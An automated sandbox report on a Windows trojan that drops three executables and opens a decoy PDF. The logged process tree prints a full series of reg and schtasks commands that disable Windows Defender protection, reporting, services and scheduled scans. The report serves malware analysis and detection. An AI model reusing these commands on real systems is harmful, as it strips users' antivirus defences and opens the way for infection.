Overview

overview

10

Static

static

daedd0017e...c4.exe

windows7_x64

10

daedd0017e...c4.exe

windows10_x64

10

Analysis

  • max time kernel
    150s
  • max time network
    145s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    12-11-2020 14:01

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    daedd0017e4c1d2488d55bd08172c84420577c6c0a1d617d4c1c455870012bc4.exe

  • Size

    15.0MB

  • MD5

    59a413614e91e86b933a42e4abdf1d43

  • SHA1

    2d4ae51600e384dfcc8c054ff8c798055d008f87

  • SHA256

    daedd0017e4c1d2488d55bd08172c84420577c6c0a1d617d4c1c455870012bc4

  • SHA512

    1e771d3c37f9035f4a813e062c9327bc1a14e34a29aee4bced9613555bb684c581cf121a83f5daa0e4a7e1ac2b430c34b3f190171d4f8a50f4f89bfdb8b6a93c

Score
10/10
evasionpersistencetrojan

Malware Config

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
    evasiontrojan
  • Executes dropped EXE 3 IoCs
  • Drops startup file 4 IoCs
  • Modifies service 2 TTPs 5 IoCs
    persistence
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
    adwarespyware
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 36 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 330 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\daedd0017e4c1d2488d55bd08172c84420577c6c0a1d617d4c1c455870012bc4.exe
    "C:\Users\Admin\AppData\Local\Temp\daedd0017e4c1d2488d55bd08172c84420577c6c0a1d617d4c1c455870012bc4.exe"
    1⤵
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:1048
    • C:\Users\Admin\AppData\Roaming\EbookReaderMui.exe
      "C:\Users\Admin\AppData\Roaming\EbookReaderMui.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2932
      • C:\Windows\System32\cmd.exe
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\528A.tmp\52AB.tmp\52AC.bat C:\Users\Admin\AppData\Roaming\EbookReaderMui.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3380
        • C:\Windows\system32\reg.exe
          reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
          4⤵
            PID:3844
          • C:\Windows\system32\reg.exe
            reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
            4⤵
              PID:2888
            • C:\Windows\system32\reg.exe
              reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
              4⤵
                PID:1528
              • C:\Windows\system32\reg.exe
                reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
                4⤵
                  PID:2052
                • C:\Windows\system32\reg.exe
                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
                  4⤵
                    PID:652
                  • C:\Windows\system32\reg.exe
                    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
                    4⤵
                      PID:3860
                    • C:\Windows\system32\reg.exe
                      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
                      4⤵
                        PID:3884
                      • C:\Windows\system32\reg.exe
                        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
                        4⤵
                          PID:2168
                        • C:\Windows\system32\reg.exe
                          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
                          4⤵
                            PID:2208
                          • C:\Windows\system32\reg.exe
                            reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
                            4⤵
                              PID:2816
                            • C:\Windows\system32\reg.exe
                              reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
                              4⤵
                                PID:2316
                              • C:\Windows\system32\reg.exe
                                reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
                                4⤵
                                  PID:2040
                                • C:\Windows\system32\reg.exe
                                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
                                  4⤵
                                    PID:2348
                                  • C:\Windows\system32\reg.exe
                                    reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
                                    4⤵
                                      PID:1052
                                    • C:\Windows\system32\reg.exe
                                      reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
                                      4⤵
                                        PID:3340
                                      • C:\Windows\system32\schtasks.exe
                                        schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
                                        4⤵
                                          PID:2740
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
                                          4⤵
                                            PID:2132
                                          • C:\Windows\system32\schtasks.exe
                                            schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
                                            4⤵
                                              PID:816
                                            • C:\Windows\system32\schtasks.exe
                                              schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
                                              4⤵
                                                PID:3868
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
                                                4⤵
                                                  PID:1228
                                                • C:\Windows\system32\reg.exe
                                                  reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
                                                  4⤵
                                                    PID:3776
                                                  • C:\Windows\system32\reg.exe
                                                    reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
                                                    4⤵
                                                      PID:2168
                                                    • C:\Windows\system32\reg.exe
                                                      reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
                                                      4⤵
                                                        PID:2704
                                                      • C:\Windows\system32\reg.exe
                                                        reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
                                                        4⤵
                                                          PID:4040
                                                        • C:\Windows\system32\reg.exe
                                                          reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
                                                          4⤵
                                                            PID:3248
                                                          • C:\Windows\system32\reg.exe
                                                            reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
                                                            4⤵
                                                            • Modifies service
                                                            PID:2184
                                                          • C:\Windows\system32\reg.exe
                                                            reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
                                                            4⤵
                                                            • Modifies service
                                                            PID:1564
                                                          • C:\Windows\system32\reg.exe
                                                            reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
                                                            4⤵
                                                            • Modifies service
                                                            PID:1800
                                                          • C:\Windows\system32\reg.exe
                                                            reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
                                                            4⤵
                                                            • Modifies service
                                                            PID:2352
                                                          • C:\Windows\system32\reg.exe
                                                            reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
                                                            4⤵
                                                            • Modifies service
                                                            PID:2628
                                                      • C:\Users\Admin\AppData\Roaming\EbookRplg.exe
                                                        "C:\Users\Admin\AppData\Roaming\EbookRplg.exe"
                                                        2⤵
                                                        • Executes dropped EXE
                                                        • Drops startup file
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:2596
                                                      • C:\Users\Admin\AppData\Roaming\EbookNplg.exe
                                                        "C:\Users\Admin\AppData\Roaming\EbookNplg.exe"
                                                        2⤵
                                                        • Executes dropped EXE
                                                        • Drops startup file
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:3012
                                                      • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Roaming\Games-Aktuell-05-2020.pdf"
                                                        2⤵
                                                        • Checks processor information in registry
                                                        • Modifies Internet Explorer settings
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of FindShellTrayWindow
                                                        • Suspicious use of SetWindowsHookEx
                                                        PID:3636
                                                        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                          "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
                                                          3⤵
                                                            PID:4236
                                                            • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                              "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=6E86A1BA060A12FE726C3E868F034FAE --mojo-platform-channel-handle=1636 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                                                              4⤵
                                                                PID:5768
                                                              • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=4334E653362C82C2B6292F59CE7C4083 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=4334E653362C82C2B6292F59CE7C4083 --renderer-client-id=2 --mojo-platform-channel-handle=1664 --allow-no-sandbox-job /prefetch:1
                                                                4⤵
                                                                  PID:5804
                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                  "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=A79D67F800ACFB489D8F92A081ADBFC0 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=A79D67F800ACFB489D8F92A081ADBFC0 --renderer-client-id=4 --mojo-platform-channel-handle=2072 --allow-no-sandbox-job /prefetch:1
                                                                  4⤵
                                                                    PID:5992
                                                                  • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=256FD7FF49275B37ECAC1B8F07E74A7F --mojo-platform-channel-handle=2460 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                                                                    4⤵
                                                                      PID:3492
                                                                    • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=9E3AFAA007230817F33F97027B63A717 --mojo-platform-channel-handle=1812 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                                                                      4⤵
                                                                        PID:4608
                                                                      • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=F32550CAE32C03F12D226685D2A1639D --mojo-platform-channel-handle=2592 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                                                                        4⤵
                                                                          PID:2260
                                                                      • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
                                                                        3⤵
                                                                          PID:5084

                                                                    Network

                                                                    MITRE ATT&CK Enterprise v6

                                                                    Replay Monitor

                                                                    Loading Replay Monitor...

                                                                    Downloads

                                                                    • memory/2260-85-0x0000000077A12000-0x0000000077A1200C-memory.dmp

                                                                      Filesize

                                                                      12B

                                                                      Download

                                                                    • memory/2596-56-0x0000000005980000-0x0000000005981000-memory.dmp

                                                                      Filesize

                                                                      4KB

                                                                      Download

                                                                    • memory/2596-60-0x0000000005960000-0x0000000005965000-memory.dmp

                                                                      Filesize

                                                                      20KB

                                                                      Download

                                                                    • memory/2596-17-0x0000000072800000-0x0000000072EEE000-memory.dmp

                                                                      Filesize

                                                                      6.9MB

                                                                      Download

                                                                    • memory/2596-55-0x0000000005830000-0x0000000005861000-memory.dmp

                                                                      Filesize

                                                                      196KB

                                                                      Download

                                                                    • memory/2596-24-0x0000000000EE0000-0x0000000000EE1000-memory.dmp

                                                                      Filesize

                                                                      4KB

                                                                      Download

                                                                    • memory/2596-62-0x0000000005D20000-0x0000000005D21000-memory.dmp

                                                                      Filesize

                                                                      4KB

                                                                      Download

                                                                    • memory/3012-42-0x0000000004E20000-0x0000000004E21000-memory.dmp

                                                                      Filesize

                                                                      4KB

                                                                      Download

                                                                    • memory/3012-25-0x0000000000570000-0x0000000000571000-memory.dmp

                                                                      Filesize

                                                                      4KB

                                                                      Download

                                                                    • memory/3012-29-0x0000000005400000-0x0000000005401000-memory.dmp

                                                                      Filesize

                                                                      4KB

                                                                      Download

                                                                    • memory/3012-58-0x0000000004F80000-0x0000000004F85000-memory.dmp

                                                                      Filesize

                                                                      20KB

                                                                      Download

                                                                    • memory/3012-16-0x0000000072800000-0x0000000072EEE000-memory.dmp

                                                                      Filesize

                                                                      6.9MB

                                                                      Download

                                                                    • memory/3012-54-0x0000000004EC0000-0x0000000004EED000-memory.dmp

                                                                      Filesize

                                                                      180KB

                                                                      Download

                                                                    • memory/3492-79-0x0000000077A12000-0x0000000077A1200C-memory.dmp

                                                                      Filesize

                                                                      12B

                                                                      Download

                                                                    • memory/4608-82-0x0000000077A12000-0x0000000077A1200C-memory.dmp

                                                                      Filesize

                                                                      12B

                                                                      Download

                                                                    • memory/5768-66-0x0000000077A12000-0x0000000077A1200C-memory.dmp

                                                                      Filesize

                                                                      12B

                                                                      Download

                                                                    • memory/5804-69-0x0000000077A12000-0x0000000077A1200C-memory.dmp

                                                                      Filesize

                                                                      12B

                                                                      Download

                                                                    • memory/5992-74-0x0000000077A12000-0x0000000077A1200C-memory.dmp

                                                                      Filesize

                                                                      12B

                                                                      Download